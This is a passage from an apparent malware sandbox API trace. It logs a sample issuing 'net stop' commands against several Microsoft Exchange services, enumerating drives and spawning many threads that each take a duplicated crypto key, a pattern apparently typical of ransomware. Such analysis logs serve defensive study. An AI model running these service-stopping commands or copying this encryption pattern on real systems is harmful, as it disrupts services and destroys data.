dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop wsbexchange", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe30, dwThreadId=0xcd4)) returned 1 [0140.006] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0140.404] CloseHandle (hObject=0x1f4) returned 1 [0140.404] CloseHandle (hObject=0x1f0) returned 1 [0140.404] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0140.404] _mbscat (in: param_1=0x29fb50, param_2=0x60ee38 | out: param_1=0x29fb50) returned 0x29fb50 [0140.404] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeServiceHost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeServiceHost", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd1c, dwThreadId=0xc74)) returned 1 [0140.412] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0140.694] CloseHandle (hObject=0x1f4) returned 1 [0140.695] CloseHandle (hObject=0x1f0) returned 1 [0140.695] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0140.695] _mbscat (in: param_1=0x29fb50, param_2=0x2888c70 | out: param_1=0x29fb50) returned 0x29fb50 [0140.695] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeSA", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeSA", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd5c, dwThreadId=0xd20)) returned 1 [0140.702] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0141.002] CloseHandle (hObject=0x1f4) returned 1 [0141.002] CloseHandle (hObject=0x1f0) returned 1 [0141.002] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0141.002] _mbscat (in: param_1=0x29fb50, param_2=0x60ec08 | out: param_1=0x29fb50) returned 0x29fb50 [0141.002] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeThrottling", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeThrottling", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0x764, dwThreadId=0xd38)) returned 1 [0141.010] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0141.429] CloseHandle (hObject=0x1f4) returned 1 [0141.429] CloseHandle (hObject=0x1f0) returned 1 [0141.429] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0141.429] _mbscat (in: param_1=0x29fb50, param_2=0x60ec80 | out: param_1=0x29fb50) returned 0x29fb50 [0141.429] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeTransport", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeTransport", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xd60, dwThreadId=0xd7c)) returned 1 [0141.436] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0142.171] CloseHandle (hObject=0x1f4) returned 1 [0142.171] CloseHandle (hObject=0x1f0) returned 1 [0142.171] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0142.171] _mbscat (in: param_1=0x29fb50, param_2=0x2888208 | out: param_1=0x29fb50) returned 0x29fb50 [0142.171] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeTransportLogSearch", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeTransportLogSearch", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xbf4, dwThreadId=0x224)) returned 1 [0142.179] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0142.583] CloseHandle (hObject=0x1f4) returned 1 [0142.583] CloseHandle (hObject=0x1f0) returned 1 [0142.583] _mbscpy (in: param_1=0x29fb50, param_2=0x4fac62 | out: param_1=0x29fb50) returned 0x29fb50 [0142.583] _mbscat (in: param_1=0x29fb50, param_2=0x60ed48 | out: param_1=0x29fb50) returned 0x29fb50 [0142.583] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c net stop MSExchangeADTopology\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x29fa0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x29f9e4 | out: lpCommandLine="/c net stop MSExchangeADTopology\"", lpProcessInformation=0x29f9e4*(hProcess=0x1f4, hThread=0x1f0, dwProcessId=0xe10, dwThreadId=0xe0c)) returned 1 [0142.589] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0142.866] CloseHandle (hObject=0x1f4) returned 1 [0142.866] CloseHandle (hObject=0x1f0) returned 1 [0142.866] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x29fa48 | out: lpBuffer="C:\\") returned 0x4 [0142.866] wcslen (_String="C:\\") returned 0x3 [0142.868] ResetEvent (hEvent=0x1f0) returned 1 [0142.868] ResumeThread (hThread=0x1f4) returned 0x1 [0142.868] Sleep (dwMilliseconds=0x0) [0142.869] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x28839a4 | out: phKey=0x28839a4*=0x8c6ba8) returned 1 [0142.997] GetCurrentThreadId () returned 0x7cc [0142.997] calloc (_Count=0x1, _Size=0xb8) returned 0x6004a0 [0142.997] GetCurrentThreadId () returned 0x7cc [0142.997] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x20c [0142.997] _beginthreadex (in: _Security=0x0, _StackSize=0xfffff, _StartAddress=0x431600, _ArgList=0x6004a0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x210 [0142.999] SetThreadPriority (hThread=0x210, nPriority=0) returned 1 [0142.999] ResetEvent (hEvent=0x20c) returned 1 [0142.999] ResumeThread (hThread=0x210) returned 0x1 [0142.999] Sleep (dwMilliseconds=0x0) [0143.001] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0xffffffff) returned 0x0 [0165.337] CloseHandle (hObject=0x1f4) returned 1 [0165.337] GetCurrentThreadId () returned 0x7cc [0165.337] GetCurrentThreadId () returned 0x7cc [0165.337] GetCurrentThreadId () returned 0x7cc [0165.337] GetCurrentThreadId () returned 0x7cc [0165.337] GetHandleInformation (in: hObject=0x210, lpdwFlags=0x29fc4c | out: lpdwFlags=0x29fc4c) returned 1 [0165.337] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xaf8 Thread: id = 3 os_tid = 0x598 Thread: id = 4 os_tid = 0xa38 Thread: id = 795 os_tid = 0x2ec [0142.868] GetCurrentThreadId () returned 0x2ec [0142.868] GetCurrentThreadId () returned 0x2ec [0142.868] GetCurrentThreadId () returned 0x2ec [0142.868] WNetGetUniversalNameW (in: lpLocalPath="C:", dwInfoLevel=0x1, lpBuffer=0x2b7f0f0, lpBufferSize=0x2b7f0ec | out: lpBuffer=0x2b7f0f0, lpBufferSize=0x2b7f0ec) returned 0x8ca [0142.883] GetAdaptersInfo (in: AdapterInfo=0x2889a30, SizePointer=0x2b7f904 | out: AdapterInfo=0x2889a30, SizePointer=0x2b7f904) returned 0x0 [0143.030] GetAdaptersInfo (in: AdapterInfo=0x2889a30, SizePointer=0x2b7f904 | out: AdapterInfo=0x2889a30, SizePointer=0x2b7f904) returned 0x0 [0143.032] localeconv () returned 0x77ac3be0 [0143.032] localeconv () returned 0x77ac3be0 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.032] _errno () returned 0x2889818 [0143.033] _errno () returned 0x2889818 [0143.033] _errno () returned 0x2889818 [0143.033] _errno () returned 0x2889818 [0143.033] _errno () returned 0x2889818 [0143.033] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x28839c4 | out: phKey=0x28839c4*=0x8c6b68) returned 1 [0143.033] GetCurrentThreadId () returned 0x2ec [0143.033] calloc (_Count=0x1, _Size=0xb8) returned 0x2889ed8 [0143.033] GetCurrentThreadId () returned 0x2ec [0143.033] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x24c [0143.033] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2889ed8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x248 [0143.034] SetThreadPriority (hThread=0x248, nPriority=0) returned 1 [0143.034] ResetEvent (hEvent=0x24c) returned 1 [0143.034] ResumeThread (hThread=0x248) returned 0x1 [0143.034] Sleep (dwMilliseconds=0x0) [0143.186] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x60058c | out: phKey=0x60058c*=0x8c6a28) returned 1 [0143.186] GetCurrentThreadId () returned 0x2ec [0143.186] calloc (_Count=0x1, _Size=0xb8) returned 0x2882f80 [0143.186] GetCurrentThreadId () returned 0x2ec [0143.186] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c [0143.186] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2882f80, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x260 [0143.187] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0143.187] ResetEvent (hEvent=0x25c) returned 1 [0143.187] ResumeThread (hThread=0x260) returned 0x1 [0143.187] Sleep (dwMilliseconds=0x0) [0143.227] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x600564 | out: phKey=0x600564*=0x8be7f8) returned 1 [0143.227] GetCurrentThreadId () returned 0x2ec [0143.227] calloc (_Count=0x1, _Size=0xb8) returned 0x2883040 [0143.227] GetCurrentThreadId () returned 0x2ec [0143.227] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x264 [0143.227] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2883040, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x268 [0143.227] SetThreadPriority (hThread=0x268, nPriority=0) returned 1 [0143.228] ResetEvent (hEvent=0x264) returned 1 [0143.228] ResumeThread (hThread=0x268) returned 0x1 [0143.228] Sleep (dwMilliseconds=0x0) [0143.249] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x60059c | out: phKey=0x60059c*=0x8be7b8) returned 1 [0143.249] GetCurrentThreadId () returned 0x2ec [0143.249] calloc (_Count=0x1, _Size=0xb8) returned 0x60d878 [0143.249] GetCurrentThreadId () returned 0x2ec [0143.249] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x208 [0143.249] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60d878, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x26c [0143.250] SetThreadPriority (hThread=0x26c, nPriority=0) returned 1 [0143.250] ResetEvent (hEvent=0x208) returned 1 [0143.250] ResumeThread (hThread=0x26c) returned 0x1 [0143.250] Sleep (dwMilliseconds=0x0) [0143.268] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x60d9ec | out: phKey=0x60d9ec*=0x8be4f8) returned 1 [0143.268] GetCurrentThreadId () returned 0x2ec [0143.268] calloc (_Count=0x1, _Size=0xb8) returned 0x60e570 [0143.268] GetCurrentThreadId () returned 0x2ec [0143.268] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x270 [0143.268] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60e570, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x274 [0143.269] SetThreadPriority (hThread=0x274, nPriority=0) returned 1 [0143.269] ResetEvent (hEvent=0x270) returned 1 [0143.269] ResumeThread (hThread=0x274) returned 0x1 [0143.269] Sleep (dwMilliseconds=0x0) [0143.272] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x288157c | out: phKey=0x288157c*=0x8be438) returned 1 [0143.272] GetCurrentThreadId () returned 0x2ec [0143.272] calloc (_Count=0x1, _Size=0xb8) returned 0x60e9b0 [0143.272] GetCurrentThreadId () returned 0x2ec [0143.272] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x278 [0143.272] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60e9b0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x27c [0143.273] SetThreadPriority (hThread=0x27c, nPriority=0) returned 1 [0143.273] ResetEvent (hEvent=0x278) returned 1 [0143.273] ResumeThread (hThread=0x27c) returned 0x1 [0143.273] Sleep (dwMilliseconds=0x0) [0143.286] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x60d85c | out: phKey=0x60d85c*=0x8be538) returned 1 [0143.286] GetCurrentThreadId () returned 0x2ec [0143.286] calloc (_Count=0x1, _Size=0xb8) returned 0x2882800 [0143.286] GetCurrentThreadId () returned 0x2ec [0143.286] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x254 [0143.287] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2882800, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x258 [0143.287] SetThreadPriority (hThread=0x258, nPriority=0) returned 1 [0143.287] ResetEvent (hEvent=0x254) returned 1 [0143.287] ResumeThread (hThread=0x258) returned 0x1 [0143.287] Sleep (dwMilliseconds=0x0) [0143.289] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x60d86c | out: phKey=0x60d86c*=0x8be8f8) returned 1 [0143.289] GetCurrentThreadId () returned 0x2ec [0143.289] calloc (_Count=0x1, _Size=0xb8) returned 0x2882ae0 [0143.289] GetCurrentThreadId () returned 0x2ec [0143.289] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x28c [0143.289] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2882ae0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x290 [0143.289] SetThreadPriority (hThread=0x290, nPriority=0) returned 1 [0143.289] ResetEvent (hEvent=0x28c) returned 1 [0143.289] ResumeThread (hThread=0x290) returned 0x1 [0143.289] Sleep (dwMilliseconds=0x0) [0143.290] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2882dc4 | out: phKey=0x2882dc4*=0x8be778) returned 1 [0143.290] GetCurrentThreadId () returned 0x2ec [0143.290] calloc (_Count=0x1, _Size=0xb8) returned 0x6099f8 [0143.290] GetCurrentThreadId () returned 0x2ec [0143.290] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x294 [0143.290] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x6099f8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x298 [0143.291] SetThreadPriority (hThread=0x298, nPriority=0) returned 1 [0143.291] ResetEvent (hEvent=0x294) returned 1 [0143.291] ResumeThread (hThread=0x298) returned 0x1 [0143.291] Sleep (dwMilliseconds=0x0) [0143.303] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2882dec | out: phKey=0x2882dec*=0x8be5f8) returned 1 [0143.303] GetCurrentThreadId () returned 0x2ec [0143.303] calloc (_Count=0x1, _Size=0xb8) returned 0x2891ea8 [0143.303] GetCurrentThreadId () returned 0x2ec [0143.303] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304 [0143.303] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2891ea8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x308 [0143.304] SetThreadPriority (hThread=0x308, nPriority=0) returned 1 [0143.304] ResetEvent (hEvent=0x304) returned 1 [0143.304] ResumeThread (hThread=0x308) returned 0x1 [0143.304] Sleep (dwMilliseconds=0x0) [0143.306] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c44 | out: phKey=0x609c44*=0x8be938) returned 1 [0143.306] GetCurrentThreadId () returned 0x2ec [0143.306] calloc (_Count=0x1, _Size=0xb8) returned 0x609ef8 [0143.306] GetCurrentThreadId () returned 0x2ec [0143.306] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318 [0143.306] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x609ef8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x31c [0143.307] SetThreadPriority (hThread=0x31c, nPriority=0) returned 1 [0143.307] ResetEvent (hEvent=0x318) returned 1 [0143.307] ResumeThread (hThread=0x31c) returned 0x1 [0143.307] Sleep (dwMilliseconds=0x0) [0143.308] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609ba4 | out: phKey=0x609ba4*=0x8be978) returned 1 [0143.308] GetCurrentThreadId () returned 0x2ec [0143.309] calloc (_Count=0x1, _Size=0xb8) returned 0x609fb8 [0143.309] GetCurrentThreadId () returned 0x2ec [0143.309] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0143.309] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x609fb8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x330 [0143.309] SetThreadPriority (hThread=0x330, nPriority=0) returned 1 [0143.309] ResetEvent (hEvent=0x32c) returned 1 [0143.309] ResumeThread (hThread=0x330) returned 0x1 [0143.309] Sleep (dwMilliseconds=0x0) [0143.311] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c74 | out: phKey=0x609c74*=0x8be678) returned 1 [0143.311] GetCurrentThreadId () returned 0x2ec [0143.311] calloc (_Count=0x1, _Size=0xb8) returned 0x2894578 [0143.311] GetCurrentThreadId () returned 0x2ec [0143.311] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340 [0143.311] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2894578, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x344 [0143.312] SetThreadPriority (hThread=0x344, nPriority=0) returned 1 [0143.312] ResetEvent (hEvent=0x340) returned 1 [0143.312] ResumeThread (hThread=0x344) returned 0x1 [0143.312] Sleep (dwMilliseconds=0x0) [0143.313] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c54 | out: phKey=0x609c54*=0x8be5b8) returned 1 [0143.313] GetCurrentThreadId () returned 0x2ec [0143.313] calloc (_Count=0x1, _Size=0xb8) returned 0x2894638 [0143.313] GetCurrentThreadId () returned 0x2ec [0143.313] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354 [0143.313] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x2894638, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x358 [0143.314] SetThreadPriority (hThread=0x358, nPriority=0) returned 1 [0143.314] ResetEvent (hEvent=0x354) returned 1 [0143.314] ResumeThread (hThread=0x358) returned 0x1 [0143.314] Sleep (dwMilliseconds=0x0) [0143.316] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b54 | out: phKey=0x609b54*=0x8be9b8) returned 1 [0143.316] GetCurrentThreadId () returned 0x2ec [0143.316] calloc (_Count=0x1, _Size=0xb8) returned 0x60e0e0 [0143.316] GetCurrentThreadId () returned 0x2ec [0143.316] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0143.316] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60e0e0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x36c [0143.316] SetThreadPriority (hThread=0x36c, nPriority=0) returned 1 [0143.316] ResetEvent (hEvent=0x368) returned 1 [0143.316] ResumeThread (hThread=0x36c) returned 0x1 [0143.316] Sleep (dwMilliseconds=0x0) [0143.318] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c04 | out: phKey=0x609c04*=0x8be6b8) returned 1 [0143.319] GetCurrentThreadId () returned 0x2ec [0143.319] calloc (_Count=0x1, _Size=0xb8) returned 0x60dba0 [0143.319] GetCurrentThreadId () returned 0x2ec [0143.319] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0143.319] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dba0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x380 [0143.319] SetThreadPriority (hThread=0x380, nPriority=0) returned 1 [0143.319] ResetEvent (hEvent=0x37c) returned 1 [0143.319] ResumeThread (hThread=0x380) returned 0x1 [0143.319] Sleep (dwMilliseconds=0x0) [0143.321] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b14 | out: phKey=0x609b14*=0x8be6f8) returned 1 [0143.321] GetCurrentThreadId () returned 0x2ec [0143.321] calloc (_Count=0x1, _Size=0xb8) returned 0x60dde0 [0143.321] GetCurrentThreadId () returned 0x2ec [0143.321] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0143.321] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dde0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x394 [0143.321] SetThreadPriority (hThread=0x394, nPriority=0) returned 1 [0143.321] ResetEvent (hEvent=0x390) returned 1 [0143.321] ResumeThread (hThread=0x394) returned 0x1 [0143.321] Sleep (dwMilliseconds=0x0) [0143.323] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609c14 | out: phKey=0x609c14*=0x8be9f8) returned 1 [0143.323] GetCurrentThreadId () returned 0x2ec [0143.323] calloc (_Count=0x1, _Size=0xb8) returned 0x60dea0 [0143.323] GetCurrentThreadId () returned 0x2ec [0143.323] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0143.323] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60dea0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3a8 [0143.323] SetThreadPriority (hThread=0x3a8, nPriority=0) returned 1 [0143.323] ResetEvent (hEvent=0x3a4) returned 1 [0143.323] ResumeThread (hThread=0x3a8) returned 0x1 [0143.323] Sleep (dwMilliseconds=0x0) [0143.325] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609b34 | out: phKey=0x609b34*=0x8be378) returned 1 [0143.325] GetCurrentThreadId () returned 0x2ec [0143.325] calloc (_Count=0x1, _Size=0xb8) returned 0x60da20 [0143.325] GetCurrentThreadId () returned 0x2ec [0143.325] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0143.325] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x60da20, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x3bc [0143.326] SetThreadPriority (hThread=0x3bc, nPriority=0) returned 1 [0143.326] ResetEvent (hEvent=0x3b8) returned 1 [0143.326] ResumeThread (hThread=0x3bc) returned 0x1 [0143.326] Sleep (dwMilliseconds=0x0) [0143.327] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x609ae4 | out: phKey=0x609ae4*=0x8be2b8) returned 1 [0143.327] GetCurrentThreadId () returned 0x2ec [0143.327] calloc (_Count=0x1, _Size=0xb8) returned 0x60dc60 [0143.327] GetCurrentThreadId () returned 0x2ec [0143.327] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0143.327] _beginthreadex (in: 